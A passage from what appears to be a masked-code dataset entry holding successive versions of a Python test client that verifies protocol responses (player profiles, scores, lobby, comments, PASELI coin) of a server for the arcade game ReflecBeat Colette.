'response/lobby/interval_p')\n self.assert_path(resp, 'response/lobby/eid')\n self.assert_path(resp, 'response/lobby/e/eid')\n self.assert_path(resp, 'response/lobby/e/mid')\n self.assert_path(resp, 'response/lobby/e/ng')\n self.assert_path(resp, 'response/lobby/e/uid')\n self.assert_path(resp, 'response/lobby/e/uattr')\n self.assert_path(resp, 'response/lobby/e/pn')\n self.assert_path(resp, 'response/lobby/e/mg')\n self.assert_path(resp, 'response/lobby/e/mopt')\n self.assert_path(resp, 'response/lobby/e/tid')\n self.assert_path(resp, 'response/lobby/e/tn')\n self.assert_path(resp, 'response/lobby/e/topt')\n self.assert_path(resp, 'response/lobby/e/lid')\n self.assert_path(resp, 'response/lobby/e/sn')\n self.assert_path(resp, 'response/lobby/e/pref')\n self.assert_path(resp, 'response/lobby/e/stg')\n self.assert_path(resp, 'response/lobby/e/pside')\n self.assert_path(resp, 'response/lobby/e/eatime')\n self.assert_path(resp, 'response/lobby/e/ga')\n self.assert_path(resp, 'response/lobby/e/gp')\n self.assert_path(resp, 'response/lobby/e/la')\n self.assert_path(resp, 'response/lobby/e/ver')\n return resp.child_value('lobby/eid')\n\n def verify_lobby_delete(self, eid: int) ->None:\n call = self.call_node()\n lobby = Node.void('lobby')\n lobby.set_attribute('method', 'delete')\n lobby.add_child(Node.s32('eid', eid))\n call.add_child(lobby)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/lobby')\n\n def verify_pzlcmt_read(self, extid: int) ->None:\n call = self.call_node()\n info = Node.void('info')\n info.set_attribute('method', 'pzlcmt_read')\n info.add_child(Node.s32('uid', extid))\n info.add_child(Node.s32('tid', 0))\n info.add_child(Node.s32('time', 0))\n info.add_child(Node.s32('limit', 30))\n call.add_child(info)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/info/comment/time')\n self.assert_path(resp, 'response/info/c/uid')\n self.assert_path(resp, 'response/info/c/name')\n self.assert_path(resp, 
'response/info/c/icon')\n self.assert_path(resp, 'response/info/c/bln')\n self.assert_path(resp, 'response/info/c/tid')\n self.assert_path(resp, 'response/info/c/t_name')\n self.assert_path(resp, 'response/info/c/pref')\n self.assert_path(resp, 'response/info/c/time')\n self.assert_path(resp, 'response/info/c/comment')\n self.assert_path(resp, 'response/info/c/is_tweet')\n found = False\n for child in resp.child('info').children:\n if child.name != 'c':\n continue\n if child.child_value('uid') == extid:\n name = child.child_value('name')\n comment = child.child_value('comment')\n if name != self.NAME:\n raise Exception(\"Invalid name '{}' returned for comment!\"\n .format(name))\n if comment != 'アメ〜〜!':\n raise Exception(\n \"Invalid comment '{}' returned for comment!\".format\n (comment))\n found = True\n if not found:\n raise Exception('Comment we posted was not found!')\n <mask token>\n\n def verify_jbrbcollabo_save(self, refid: str) ->None:\n call = self.call_node()\n jbrbcollabo = Node.void('jbrbcollabo')\n jbrbcollabo.set_attribute('method', 'save')\n jbrbcollabo.add_child(Node.string('ref_id', refid))\n jbrbcollabo.add_child(Node.u16('cre_count', 0))\n call.add_child(jbrbcollabo)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/jbrbcollabo')\n\n def verify(self, cardid: Optional[str]) ->None:\n self.verify_services_get(expected_services=['pcbtracker',\n 'pcbevent', 'local', 'message', 'facility', 'cardmng',\n 'package', 'posevent', 'pkglist', 'dlstatus', 'eacoin', 'lobby',\n 'ntp', 'keepalive'])\n paseli_enabled = self.verify_pcbtracker_alive()\n self.verify_message_get()\n self.verify_package_list()\n location = self.verify_facility_get()\n self.verify_pcbevent_put()\n self.verify_pcb_boot(location)\n self.verify_info_common()\n if cardid is not None:\n card = cardid\n else:\n card = self.random_card()\n print('Generated random card ID {} for use.'.format(card))\n if cardid is None:\n self.verify_cardmng_inquire(card, 
msg_type='unregistered',\n paseli_enabled=paseli_enabled)\n ref_id = self.verify_cardmng_getrefid(card)\n if len(ref_id) != 16:\n raise Exception(\n \"Invalid refid '{}' returned when registering card\".\n format(ref_id))\n if ref_id != self.verify_cardmng_inquire(card, msg_type='new',\n paseli_enabled=paseli_enabled):\n raise Exception(\n \"Invalid refid '{}' returned when querying card\".format\n (ref_id))\n self.verify_player_start(ref_id)\n self.verify_player_delete(ref_id)\n self.verify_player_succeed(ref_id)\n extid = self.verify_player_write(ref_id, location, [{'id': 0,\n 'chart': 0, 'clear_type': -1, 'achievement_rate': 0,\n 'score': 0, 'combo': 0, 'miss_count': 0}])\n else:\n print('Skipping new card checks for existing card')\n ref_id = self.verify_cardmng_inquire(card, msg_type='query',\n paseli_enabled=paseli_enabled)\n self.verify_cardmng_authpass(ref_id, correct=True)\n self.verify_cardmng_authpass(ref_id, correct=False)\n if ref_id != self.verify_cardmng_inquire(card, msg_type='query',\n paseli_enabled=paseli_enabled):\n raise Exception(\"Invalid refid '{}' returned when querying card\"\n .format(ref_id))\n self.verify_lobby_read(location, extid)\n eid = self.verify_lobby_entry(location, extid)\n self.verify_lobby_delete(eid)\n self.verify_pzlcmt_write(extid)\n self.verify_pzlcmt_read(extid)\n self.verify_jbrbcollabo_save(ref_id)\n if cardid is None:\n for phase in [1, 2]:\n if phase == 1:\n dummyscores = [{'id': 1, 'chart': 1, 'clear_type': 2,\n 'achievement_rate': 7543, 'score': 432, 'combo': \n 123, 'miss_count': 5}, {'id': 1, 'chart': 0,\n 'clear_type': 4, 'achievement_rate': 9876, 'score':\n 543, 'combo': 543, 'miss_count': 0}, {'id': 3,\n 'chart': 2, 'clear_type': 2, 'achievement_rate': \n 1234, 'score': 123, 'combo': 42, 'miss_count': 54},\n {'id': 3, 'chart': 0, 'clear_type': 2,\n 'achievement_rate': 1024, 'score': 50, 'combo': 12,\n 'miss_count': 90}]\n if phase == 2:\n dummyscores = [{'id': 1, 'chart': 1, 'clear_type': 3,\n 
'achievement_rate': 8765, 'score': 469, 'combo': \n 468, 'miss_count': 1}, {'id': 1, 'chart': 0,\n 'clear_type': 2, 'achievement_rate': 8765, 'score':\n 432, 'combo': 321, 'miss_count': 15,\n 'expected_score': 543, 'expected_clear_type': 4,\n 'expected_achievement_rate': 9876, 'expected_combo':\n 543, 'expected_miss_count': 0}]\n self.verify_player_write(ref_id, location, dummyscores)\n scores = self.verify_player_read(ref_id, location)\n for expected in dummyscores:\n actual = None\n for received in scores:\n if received['id'] == expected['id'] and received[\n 'chart'] == expected['chart']:\n actual = received\n break\n if actual is None:\n raise Exception(\n \"Didn't find song {} chart {} in response!\".\n format(expected['id'], expected['chart']))\n if 'expected_score' in expected:\n expected_score = expected['expected_score']\n else:\n expected_score = expected['score']\n if 'expected_achievement_rate' in expected:\n expected_achievement_rate = expected[\n 'expected_achievement_rate']\n else:\n expected_achievement_rate = expected['achievement_rate'\n ]\n if 'expected_clear_type' in expected:\n expected_clear_type = expected['expected_clear_type']\n else:\n expected_clear_type = expected['clear_type']\n if 'expected_combo' in expected:\n expected_combo = expected['expected_combo']\n else:\n expected_combo = expected['combo']\n if 'expected_miss_count' in expected:\n expected_miss_count = expected['expected_miss_count']\n else:\n expected_miss_count = expected['miss_count']\n if actual['score'] != expected_score:\n raise Exception(\n \"Expected a score of '{}' for song '{}' chart '{}' but got score '{}'\"\n .format(expected_score, expected['id'],\n expected['chart'], actual['score']))\n if actual['achievement_rate'] != expected_achievement_rate:\n raise Exception(\n \"Expected an achievement rate of '{}' for song '{}' chart '{}' but got achievement rate '{}'\"\n .format(expected_achievement_rate, expected[\n 'id'], expected['chart'], actual[\n 
'achievement_rate']))\n if actual['clear_type'] != expected_clear_type:\n raise Exception(\n \"Expected a clear_type of '{}' for song '{}' chart '{}' but got clear_type '{}'\"\n .format(expected_clear_type, expected['id'],\n expected['chart'], actual['clear_type']))\n if actual['combo'] != expected_combo:\n raise Exception(\n \"Expected a combo of '{}' for song '{}' chart '{}' but got combo '{}'\"\n .format(expected_combo, expected['id'],\n expected['chart'], actual['combo']))\n if actual['miss_count'] != expected_miss_count:\n raise Exception(\n \"Expected a miss count of '{}' for song '{}' chart '{}' but got miss count '{}'\"\n .format(expected_miss_count, expected['id'],\n expected['chart'], actual['miss_count']))\n time.sleep(1)\n else:\n print('Skipping score checks for existing card')\n self.verify_player_end(ref_id)\n self.verify_info_ranking()\n if paseli_enabled:\n print('PASELI enabled for this PCBID, executing PASELI checks')\n else:\n print('PASELI disabled for this PCBID, skipping PASELI checks')\n return\n sessid, balance = self.verify_eacoin_checkin(card)\n if balance == 0:\n print('Skipping PASELI consume check because card has 0 balance')\n else:\n self.verify_eacoin_consume(sessid, balance, random.randint(0,\n balance))\n self.verify_eacoin_checkout(sessid)\n",
"step-3": "<mask token>\n\n\nclass ReflecBeatColette(BaseClient):\n <mask token>\n\n def verify_pcb_boot(self, loc: str) ->None:\n call = self.call_node()\n pcb = Node.void('pcb')\n pcb.set_attribute('method', 'boot')\n pcb.add_child(Node.string('lid', loc))\n call.add_child(pcb)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/pcb/sinfo/nm')\n self.assert_path(resp, 'response/pcb/sinfo/cl_enbl')\n self.assert_path(resp, 'response/pcb/sinfo/cl_h')\n self.assert_path(resp, 'response/pcb/sinfo/cl_m')\n\n def verify_info_common(self) ->None:\n call = self.call_node()\n info = Node.void('info')\n info.set_attribute('method', 'common')\n call.add_child(info)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/info/event_ctrl')\n self.assert_path(resp, 'response/info/item_lock_ctrl')\n\n def verify_info_ranking(self) ->None:\n call = self.call_node()\n info = Node.void('info')\n info.set_attribute('method', 'ranking')\n info.add_child(Node.s32('ver', 0))\n call.add_child(info)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/info/ver')\n self.assert_path(resp, 'response/info/ranking/weekly/bt')\n self.assert_path(resp, 'response/info/ranking/weekly/et')\n self.assert_path(resp, 'response/info/ranking/weekly/new/d/mid')\n self.assert_path(resp, 'response/info/ranking/weekly/new/d/cnt')\n self.assert_path(resp, 'response/info/ranking/monthly/bt')\n self.assert_path(resp, 'response/info/ranking/monthly/et')\n self.assert_path(resp, 'response/info/ranking/monthly/new/d/mid')\n self.assert_path(resp, 'response/info/ranking/monthly/new/d/cnt')\n self.assert_path(resp, 'response/info/ranking/total/bt')\n self.assert_path(resp, 'response/info/ranking/total/et')\n self.assert_path(resp, 'response/info/ranking/total/new/d/mid')\n self.assert_path(resp, 'response/info/ranking/total/new/d/cnt')\n\n def verify_player_start(self, refid: str) ->None:\n call = self.call_node()\n player = Node.void('player')\n 
player.set_attribute('method', 'start')\n player.add_child(Node.string('rid', refid))\n player.add_child(Node.u8_array('ga', [127, 0, 0, 1]))\n player.add_child(Node.u16('gp', 10573))\n player.add_child(Node.u8_array('la', [16, 0, 0, 0]))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/plyid')\n self.assert_path(resp, 'response/player/start_time')\n self.assert_path(resp, 'response/player/event_ctrl')\n self.assert_path(resp, 'response/player/item_lock_ctrl')\n self.assert_path(resp, 'response/player/lincle_link_4')\n self.assert_path(resp, 'response/player/jbrbcollabo')\n self.assert_path(resp, 'response/player/tricolettepark')\n\n def verify_player_delete(self, refid: str) ->None:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'delete')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player')\n\n def verify_player_end(self, refid: str) ->None:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'end')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player')\n\n def verify_player_succeed(self, refid: str) ->None:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'succeed')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/name')\n self.assert_path(resp, 'response/player/lv')\n self.assert_path(resp, 'response/player/exp')\n self.assert_path(resp, 'response/player/grd')\n self.assert_path(resp, 'response/player/ap')\n self.assert_path(resp, 'response/player/released')\n self.assert_path(resp, 'response/player/mrecord')\n\n def verify_player_read(self, refid: str, location: str) ->List[Dict[str,\n int]]:\n call = 
self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'read')\n player.add_child(Node.string('rid', refid))\n player.add_child(Node.string('lid', location))\n player.add_child(Node.s16('ver', 5))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/pdata/account/usrid')\n self.assert_path(resp, 'response/player/pdata/account/tpc')\n self.assert_path(resp, 'response/player/pdata/account/dpc')\n self.assert_path(resp, 'response/player/pdata/account/crd')\n self.assert_path(resp, 'response/player/pdata/account/brd')\n self.assert_path(resp, 'response/player/pdata/account/tdc')\n self.assert_path(resp, 'response/player/pdata/account/intrvld')\n self.assert_path(resp, 'response/player/pdata/account/ver')\n self.assert_path(resp, 'response/player/pdata/account/pst')\n self.assert_path(resp, 'response/player/pdata/account/st')\n self.assert_path(resp, 'response/player/pdata/base/name')\n self.assert_path(resp, 'response/player/pdata/base/exp')\n self.assert_path(resp, 'response/player/pdata/base/lv')\n self.assert_path(resp, 'response/player/pdata/base/mg')\n self.assert_path(resp, 'response/player/pdata/base/ap')\n self.assert_path(resp, 'response/player/pdata/base/tid')\n self.assert_path(resp, 'response/player/pdata/base/tname')\n self.assert_path(resp, 'response/player/pdata/base/cmnt')\n self.assert_path(resp, 'response/player/pdata/base/uattr')\n self.assert_path(resp, 'response/player/pdata/base/hidden_param')\n self.assert_path(resp, 'response/player/pdata/base/tbs')\n self.assert_path(resp, 'response/player/pdata/base/tbs_r')\n self.assert_path(resp, 'response/player/pdata/rival')\n self.assert_path(resp, 'response/player/pdata/fav_music_slot')\n self.assert_path(resp, 'response/player/pdata/custom')\n self.assert_path(resp, 'response/player/pdata/config')\n self.assert_path(resp, 'response/player/pdata/stamp')\n self.assert_path(resp, 'response/player/pdata/released')\n 
self.assert_path(resp, 'response/player/pdata/record')\n if resp.child_value('player/pdata/base/name') != self.NAME:\n raise Exception('Invalid name {} returned on profile read!'.\n format(resp.child_value('player/pdata/base/name')))\n scores = []\n for child in resp.child('player/pdata/record').children:\n if child.name != 'rec':\n continue\n score = {'id': child.child_value('mid'), 'chart': child.\n child_value('ntgrd'), 'clear_type': child.child_value('ct'),\n 'achievement_rate': child.child_value('ar'), 'score': child\n .child_value('scr'), 'combo': child.child_value('cmb'),\n 'miss_count': child.child_value('ms')}\n scores.append(score)\n return scores\n\n def verify_player_write(self, refid: str, loc: str, scores: List[Dict[\n str, int]]) ->int:\n call = self.call_node()\n player = Node.void('player')\n call.add_child(player)\n player.set_attribute('method', 'write')\n pdata = Node.void('pdata')\n player.add_child(pdata)\n account = Node.void('account')\n pdata.add_child(account)\n account.add_child(Node.s32('usrid', 0))\n account.add_child(Node.s32('plyid', 0))\n account.add_child(Node.s32('tpc', 1))\n account.add_child(Node.s32('dpc', 1))\n account.add_child(Node.s32('crd', 1))\n account.add_child(Node.s32('brd', 1))\n account.add_child(Node.s32('tdc', 1))\n account.add_child(Node.string('rid', refid))\n account.add_child(Node.string('lid', loc))\n account.add_child(Node.u8('mode', 0))\n account.add_child(Node.s16('ver', 5))\n account.add_child(Node.bool('pp', True))\n account.add_child(Node.bool('ps', True))\n account.add_child(Node.s16('pay', 0))\n account.add_child(Node.s16('pay_pc', 0))\n account.add_child(Node.u64('st', int(time.time() * 1000)))\n base = Node.void('base')\n pdata.add_child(base)\n base.add_child(Node.string('name', self.NAME))\n base.add_child(Node.s32('exp', 0))\n base.add_child(Node.s32('lv', 1))\n base.add_child(Node.s32('mg', -1))\n base.add_child(Node.s32('ap', -1))\n base.add_child(Node.s32_array('hidden_param', [0, 0, 0, 0, 0, 
0, 0,\n 0, 0, 0, 0, 0, 0, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, \n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]))\n base.add_child(Node.bool('is_tut', True))\n stglog = Node.void('stglog')\n pdata.add_child(stglog)\n index = 0\n for score in scores:\n log = Node.void('log')\n stglog.add_child(log)\n log.add_child(Node.s8('stg', index))\n log.add_child(Node.s16('mid', score['id']))\n log.add_child(Node.s8('ng', score['chart']))\n log.add_child(Node.s8('col', 0))\n log.add_child(Node.s8('mt', 7))\n log.add_child(Node.s8('rt', 0))\n log.add_child(Node.s8('ct', score['clear_type']))\n log.add_child(Node.s16('grd', 0))\n log.add_child(Node.s16('ar', score['achievement_rate']))\n log.add_child(Node.s16('sc', score['score']))\n log.add_child(Node.s16('jt_jst', 0))\n log.add_child(Node.s16('jt_grt', 0))\n log.add_child(Node.s16('jt_gd', 0))\n log.add_child(Node.s16('jt_ms', score['miss_count']))\n log.add_child(Node.s16('jt_jr', 0))\n log.add_child(Node.s16('cmb', score['combo']))\n log.add_child(Node.s16('exp', 0))\n log.add_child(Node.s32('r_uid', 0))\n log.add_child(Node.s32('r_plyid', 0))\n log.add_child(Node.s8('r_stg', 0))\n log.add_child(Node.s8('r_ct', -1))\n log.add_child(Node.s16('r_sc', 0))\n log.add_child(Node.s16('r_grd', 0))\n log.add_child(Node.s16('r_ar', 0))\n log.add_child(Node.s8('r_cpuid', -1))\n log.add_child(Node.s32('time', int(time.time())))\n log.add_child(Node.s8('decide', 0))\n index = index + 1\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/uid')\n return resp.child_value('player/uid')\n <mask token>\n\n def verify_lobby_entry(self, location: str, extid: int) ->int:\n call = self.call_node()\n lobby = Node.void('lobby')\n lobby.set_attribute('method', 'entry')\n e = Node.void('e')\n lobby.add_child(e)\n e.add_child(Node.s32('eid', 0))\n e.add_child(Node.u16('mid', 79))\n e.add_child(Node.u8('ng', 0))\n e.add_child(Node.s32('uid', extid))\n e.add_child(Node.s32('uattr', 0))\n 
e.add_child(Node.string('pn', self.NAME))\n e.add_child(Node.s16('mg', 255))\n e.add_child(Node.s32('mopt', 0))\n e.add_child(Node.s32('tid', 0))\n e.add_child(Node.string('tn', ''))\n e.add_child(Node.s32('topt', 0))\n e.add_child(Node.string('lid', location))\n e.add_child(Node.string('sn', ''))\n e.add_child(Node.u8('pref', 51))\n e.add_child(Node.s8('stg', 4))\n e.add_child(Node.s8('pside', 0))\n e.add_child(Node.s16('eatime', 30))\n e.add_child(Node.u8_array('ga', [127, 0, 0, 1]))\n e.add_child(Node.u16('gp', 10007))\n e.add_child(Node.u8_array('la', [16, 0, 0, 0]))\n e.add_child(Node.u8('ver', 5))\n lobby.add_child(Node.s32_array('friend', []))\n call.add_child(lobby)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/lobby/interval')\n self.assert_path(resp, 'response/lobby/interval_p')\n self.assert_path(resp, 'response/lobby/eid')\n self.assert_path(resp, 'response/lobby/e/eid')\n self.assert_path(resp, 'response/lobby/e/mid')\n self.assert_path(resp, 'response/lobby/e/ng')\n self.assert_path(resp, 'response/lobby/e/uid')\n self.assert_path(resp, 'response/lobby/e/uattr')\n self.assert_path(resp, 'response/lobby/e/pn')\n self.assert_path(resp, 'response/lobby/e/mg')\n self.assert_path(resp, 'response/lobby/e/mopt')\n self.assert_path(resp, 'response/lobby/e/tid')\n self.assert_path(resp, 'response/lobby/e/tn')\n self.assert_path(resp, 'response/lobby/e/topt')\n self.assert_path(resp, 'response/lobby/e/lid')\n self.assert_path(resp, 'response/lobby/e/sn')\n self.assert_path(resp, 'response/lobby/e/pref')\n self.assert_path(resp, 'response/lobby/e/stg')\n self.assert_path(resp, 'response/lobby/e/pside')\n self.assert_path(resp, 'response/lobby/e/eatime')\n self.assert_path(resp, 'response/lobby/e/ga')\n self.assert_path(resp, 'response/lobby/e/gp')\n self.assert_path(resp, 'response/lobby/e/la')\n self.assert_path(resp, 'response/lobby/e/ver')\n return resp.child_value('lobby/eid')\n\n def verify_lobby_delete(self, eid: int) ->None:\n call = 
self.call_node()\n lobby = Node.void('lobby')\n lobby.set_attribute('method', 'delete')\n lobby.add_child(Node.s32('eid', eid))\n call.add_child(lobby)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/lobby')\n\n def verify_pzlcmt_read(self, extid: int) ->None:\n call = self.call_node()\n info = Node.void('info')\n info.set_attribute('method', 'pzlcmt_read')\n info.add_child(Node.s32('uid', extid))\n info.add_child(Node.s32('tid', 0))\n info.add_child(Node.s32('time', 0))\n info.add_child(Node.s32('limit', 30))\n call.add_child(info)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/info/comment/time')\n self.assert_path(resp, 'response/info/c/uid')\n self.assert_path(resp, 'response/info/c/name')\n self.assert_path(resp, 'response/info/c/icon')\n self.assert_path(resp, 'response/info/c/bln')\n self.assert_path(resp, 'response/info/c/tid')\n self.assert_path(resp, 'response/info/c/t_name')\n self.assert_path(resp, 'response/info/c/pref')\n self.assert_path(resp, 'response/info/c/time')\n self.assert_path(resp, 'response/info/c/comment')\n self.assert_path(resp, 'response/info/c/is_tweet')\n found = False\n for child in resp.child('info').children:\n if child.name != 'c':\n continue\n if child.child_value('uid') == extid:\n name = child.child_value('name')\n comment = child.child_value('comment')\n if name != self.NAME:\n raise Exception(\"Invalid name '{}' returned for comment!\"\n .format(name))\n if comment != 'アメ〜〜!':\n raise Exception(\n \"Invalid comment '{}' returned for comment!\".format\n (comment))\n found = True\n if not found:\n raise Exception('Comment we posted was not found!')\n\n def verify_pzlcmt_write(self, extid: int) ->None:\n call = self.call_node()\n info = Node.void('info')\n info.set_attribute('method', 'pzlcmt_write')\n info.add_child(Node.s32('uid', extid))\n info.add_child(Node.string('name', self.NAME))\n info.add_child(Node.s16('icon', 0))\n info.add_child(Node.s8('bln', 0))\n 
info.add_child(Node.s32('tid', 0))\n info.add_child(Node.string('t_name', ''))\n info.add_child(Node.s8('pref', 51))\n info.add_child(Node.s32('time', int(time.time())))\n info.add_child(Node.string('comment', 'アメ〜〜!'))\n info.add_child(Node.bool('is_tweet', True))\n call.add_child(info)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/info')\n\n def verify_jbrbcollabo_save(self, refid: str) ->None:\n call = self.call_node()\n jbrbcollabo = Node.void('jbrbcollabo')\n jbrbcollabo.set_attribute('method', 'save')\n jbrbcollabo.add_child(Node.string('ref_id', refid))\n jbrbcollabo.add_child(Node.u16('cre_count', 0))\n call.add_child(jbrbcollabo)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/jbrbcollabo')\n\n def verify(self, cardid: Optional[str]) ->None:\n self.verify_services_get(expected_services=['pcbtracker',\n 'pcbevent', 'local', 'message', 'facility', 'cardmng',\n 'package', 'posevent', 'pkglist', 'dlstatus', 'eacoin', 'lobby',\n 'ntp', 'keepalive'])\n paseli_enabled = self.verify_pcbtracker_alive()\n self.verify_message_get()\n self.verify_package_list()\n location = self.verify_facility_get()\n self.verify_pcbevent_put()\n self.verify_pcb_boot(location)\n self.verify_info_common()\n if cardid is not None:\n card = cardid\n else:\n card = self.random_card()\n print('Generated random card ID {} for use.'.format(card))\n if cardid is None:\n self.verify_cardmng_inquire(card, msg_type='unregistered',\n paseli_enabled=paseli_enabled)\n ref_id = self.verify_cardmng_getrefid(card)\n if len(ref_id) != 16:\n raise Exception(\n \"Invalid refid '{}' returned when registering card\".\n format(ref_id))\n if ref_id != self.verify_cardmng_inquire(card, msg_type='new',\n paseli_enabled=paseli_enabled):\n raise Exception(\n \"Invalid refid '{}' returned when querying card\".format\n (ref_id))\n self.verify_player_start(ref_id)\n self.verify_player_delete(ref_id)\n self.verify_player_succeed(ref_id)\n extid = 
self.verify_player_write(ref_id, location, [{'id': 0,\n 'chart': 0, 'clear_type': -1, 'achievement_rate': 0,\n 'score': 0, 'combo': 0, 'miss_count': 0}])\n else:\n print('Skipping new card checks for existing card')\n ref_id = self.verify_cardmng_inquire(card, msg_type='query',\n paseli_enabled=paseli_enabled)\n self.verify_cardmng_authpass(ref_id, correct=True)\n self.verify_cardmng_authpass(ref_id, correct=False)\n if ref_id != self.verify_cardmng_inquire(card, msg_type='query',\n paseli_enabled=paseli_enabled):\n raise Exception(\"Invalid refid '{}' returned when querying card\"\n .format(ref_id))\n self.verify_lobby_read(location, extid)\n eid = self.verify_lobby_entry(location, extid)\n self.verify_lobby_delete(eid)\n self.verify_pzlcmt_write(extid)\n self.verify_pzlcmt_read(extid)\n self.verify_jbrbcollabo_save(ref_id)\n if cardid is None:\n for phase in [1, 2]:\n if phase == 1:\n dummyscores = [{'id': 1, 'chart': 1, 'clear_type': 2,\n 'achievement_rate': 7543, 'score': 432, 'combo': \n 123, 'miss_count': 5}, {'id': 1, 'chart': 0,\n 'clear_type': 4, 'achievement_rate': 9876, 'score':\n 543, 'combo': 543, 'miss_count': 0}, {'id': 3,\n 'chart': 2, 'clear_type': 2, 'achievement_rate': \n 1234, 'score': 123, 'combo': 42, 'miss_count': 54},\n {'id': 3, 'chart': 0, 'clear_type': 2,\n 'achievement_rate': 1024, 'score': 50, 'combo': 12,\n 'miss_count': 90}]\n if phase == 2:\n dummyscores = [{'id': 1, 'chart': 1, 'clear_type': 3,\n 'achievement_rate': 8765, 'score': 469, 'combo': \n 468, 'miss_count': 1}, {'id': 1, 'chart': 0,\n 'clear_type': 2, 'achievement_rate': 8765, 'score':\n 432, 'combo': 321, 'miss_count': 15,\n 'expected_score': 543, 'expected_clear_type': 4,\n 'expected_achievement_rate': 9876, 'expected_combo':\n 543, 'expected_miss_count': 0}]\n self.verify_player_write(ref_id, location, dummyscores)\n scores = self.verify_player_read(ref_id, location)\n for expected in dummyscores:\n actual = None\n for received in scores:\n if received['id'] == 
expected['id'] and received[\n 'chart'] == expected['chart']:\n actual = received\n break\n if actual is None:\n raise Exception(\n \"Didn't find song {} chart {} in response!\".\n format(expected['id'], expected['chart']))\n if 'expected_score' in expected:\n expected_score = expected['expected_score']\n else:\n expected_score = expected['score']\n if 'expected_achievement_rate' in expected:\n expected_achievement_rate = expected[\n 'expected_achievement_rate']\n else:\n expected_achievement_rate = expected['achievement_rate'\n ]\n if 'expected_clear_type' in expected:\n expected_clear_type = expected['expected_clear_type']\n else:\n expected_clear_type = expected['clear_type']\n if 'expected_combo' in expected:\n expected_combo = expected['expected_combo']\n else:\n expected_combo = expected['combo']\n if 'expected_miss_count' in expected:\n expected_miss_count = expected['expected_miss_count']\n else:\n expected_miss_count = expected['miss_count']\n if actual['score'] != expected_score:\n raise Exception(\n \"Expected a score of '{}' for song '{}' chart '{}' but got score '{}'\"\n .format(expected_score, expected['id'],\n expected['chart'], actual['score']))\n if actual['achievement_rate'] != expected_achievement_rate:\n raise Exception(\n \"Expected an achievement rate of '{}' for song '{}' chart '{}' but got achievement rate '{}'\"\n .format(expected_achievement_rate, expected[\n 'id'], expected['chart'], actual[\n 'achievement_rate']))\n if actual['clear_type'] != expected_clear_type:\n raise Exception(\n \"Expected a clear_type of '{}' for song '{}' chart '{}' but got clear_type '{}'\"\n .format(expected_clear_type, expected['id'],\n expected['chart'], actual['clear_type']))\n if actual['combo'] != expected_combo:\n raise Exception(\n \"Expected a combo of '{}' for song '{}' chart '{}' but got combo '{}'\"\n .format(expected_combo, expected['id'],\n expected['chart'], actual['combo']))\n if actual['miss_count'] != expected_miss_count:\n raise Exception(\n 
\"Expected a miss count of '{}' for song '{}' chart '{}' but got miss count '{}'\"\n .format(expected_miss_count, expected['id'],\n expected['chart'], actual['miss_count']))\n time.sleep(1)\n else:\n print('Skipping score checks for existing card')\n self.verify_player_end(ref_id)\n self.verify_info_ranking()\n if paseli_enabled:\n print('PASELI enabled for this PCBID, executing PASELI checks')\n else:\n print('PASELI disabled for this PCBID, skipping PASELI checks')\n return\n sessid, balance = self.verify_eacoin_checkin(card)\n if balance == 0:\n print('Skipping PASELI consume check because card has 0 balance')\n else:\n self.verify_eacoin_consume(sessid, balance, random.randint(0,\n balance))\n self.verify_eacoin_checkout(sessid)\n",
"step-4": "<mask token>\n\n\nclass ReflecBeatColette(BaseClient):\n NAME = 'TEST'\n\n def verify_pcb_boot(self, loc: str) ->None:\n call = self.call_node()\n pcb = Node.void('pcb')\n pcb.set_attribute('method', 'boot')\n pcb.add_child(Node.string('lid', loc))\n call.add_child(pcb)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/pcb/sinfo/nm')\n self.assert_path(resp, 'response/pcb/sinfo/cl_enbl')\n self.assert_path(resp, 'response/pcb/sinfo/cl_h')\n self.assert_path(resp, 'response/pcb/sinfo/cl_m')\n\n def verify_info_common(self) ->None:\n call = self.call_node()\n info = Node.void('info')\n info.set_attribute('method', 'common')\n call.add_child(info)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/info/event_ctrl')\n self.assert_path(resp, 'response/info/item_lock_ctrl')\n\n def verify_info_ranking(self) ->None:\n call = self.call_node()\n info = Node.void('info')\n info.set_attribute('method', 'ranking')\n info.add_child(Node.s32('ver', 0))\n call.add_child(info)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/info/ver')\n self.assert_path(resp, 'response/info/ranking/weekly/bt')\n self.assert_path(resp, 'response/info/ranking/weekly/et')\n self.assert_path(resp, 'response/info/ranking/weekly/new/d/mid')\n self.assert_path(resp, 'response/info/ranking/weekly/new/d/cnt')\n self.assert_path(resp, 'response/info/ranking/monthly/bt')\n self.assert_path(resp, 'response/info/ranking/monthly/et')\n self.assert_path(resp, 'response/info/ranking/monthly/new/d/mid')\n self.assert_path(resp, 'response/info/ranking/monthly/new/d/cnt')\n self.assert_path(resp, 'response/info/ranking/total/bt')\n self.assert_path(resp, 'response/info/ranking/total/et')\n self.assert_path(resp, 'response/info/ranking/total/new/d/mid')\n self.assert_path(resp, 'response/info/ranking/total/new/d/cnt')\n\n def verify_player_start(self, refid: str) ->None:\n 